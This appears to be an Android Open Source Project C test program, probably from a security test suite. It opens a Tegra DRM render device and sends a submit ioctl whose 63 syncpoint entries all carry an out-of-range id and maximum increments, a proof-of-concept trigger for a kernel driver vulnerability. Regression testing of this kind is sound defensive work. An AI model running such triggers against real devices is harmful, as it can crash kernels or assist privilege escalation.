1 /*
2 * Copyright (C) 2017 The Android Open Source Project
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16 #define _GNU_SOURCE
17 #include <string.h>
18 #include <stdio.h>
19 #include <stdlib.h>
20 #include <sys/ioctl.h>
21 #include <errno.h>
22 #include <sys/stat.h>
23 #include <fcntl.h>
24 #include <sys/types.h>
25 #include <unistd.h>
26 #include <sys/syscall.h>
27
28 #include "local_pwn.h"
29
30 #define DEV "/dev/dri/renderD129"
31 #define SYN_NUM 64
32
33 struct drm_tegra_open_channel open_c = { 0 };
34 struct drm_tegra_submit submit_c = { 0 };
35 struct drm_tegra_syncpt syncpts[SYN_NUM] = { 0 };
36
main()37 int main()
38 {
39 int ret;
40 int dev_fd;
41 int i;
42
43 /* open dev */
44 dev_fd = open(DEV,O_RDONLY);
45 if(dev_fd == -1){
46 printf("[-] open dev failed %d %s\n", errno, strerror(errno));
47 return 0;
48 }
49
50 /* prepare for ioctl */
51 open_c.client = HOST1X_CLASS_VIC;
52 submit_c.num_syncpts = SYN_NUM;
53 submit_c.syncpts = (__u64)syncpts;
54
55 for(i = 1; i < SYN_NUM; i++){
56 syncpts[i].id = 192;
57 syncpts[i].incrs = 0xffff;
58 }
59
60 /* open channel */
61 ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
62 if(ret == -1){
63 printf("[-] open_channel failed %d %s\n", errno, strerror(errno));
64 goto out_dev;
65 }
66 submit_c.context = open_c.context;
67 printf("[+] call submit\n");
68 ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
69 printf("[+] submit return %d\n", ret);
70
71 out_dev:
72 close(dev_fd);
73 return 0;
74 }
75